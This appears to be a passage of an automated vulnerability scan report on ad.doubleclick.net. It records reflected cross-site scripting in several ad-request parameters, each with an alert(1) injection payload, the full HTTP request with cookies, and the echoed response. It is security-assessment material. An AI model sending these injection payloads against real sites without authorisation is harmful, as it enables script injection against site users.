Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=835f0"-alert(1)-"b57ef62ecd6&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW
...[SNIP]...

2.16. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c202"-alert(1)-"cae4b935fff was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=4c202"-alert(1)-"cae4b935fff HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7198
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:54 GMT
Expires: Thu, 12 May 2011 13:33:54 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
d=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=4c202"-alert(1)-"cae4b935fffhttp://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_NA_300X250_A");
var fscUrl = url;
...[SNIP]...

2.17. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb0b4"-alert(1)-"b2cfa13b6 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cncb0b4"-alert(1)-"b2cfa13b6&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7202

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
49/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cncb0b4"-alert(1)-"b2cfa13b6&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t
...[SNIP]...

2.18. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7930"-alert(1)-"94b55cfc87e was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=e7930"-alert(1)-"94b55cfc87e&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=e7930"-alert(1)-"94b55cfc87e&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.1
...[SNIP]...

2.19. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb80b"-alert(1)-"2b1e9684f83 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616bb80b"-alert(1)-"2b1e9684f83&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
2874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616bb80b"-alert(1)-"2b1e9684f83&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http
...[SNIP]...

2.20. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f33e6"-alert(1)-"c79dbcd5ee was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253Af33e6"-alert(1)-"c79dbcd5ee&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
/17/14a/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253Af33e6"-alert(1)-"c79dbcd5ee&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAA
...[SNIP]...

2.21. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13b18"-alert(1)-"5dc3b23c1c5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=13b18"-alert(1)-"5dc3b23c1c5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
17%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=13b18"-alert(1)-"5dc3b23c1c5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q2
...[SNIP]...

2.22. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac689"-alert(1)-"dc8c391f7a was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=ac689"-alert(1)-"dc8c391f7a&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
c%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=ac689"-alert(1)-"dc8c391f7a&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=O
...[SNIP]...

2.23. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4838"-alert(1)-"8c657af55e4 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=f4838"-alert(1)-"8c657af55e4&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=f4838"-alert(1)-"8c657af55e4&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=20
...[SNIP]...

2.24. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2449a"-alert(1)-"02e7851709b was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=2449a"-alert(1)-"02e7851709b&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
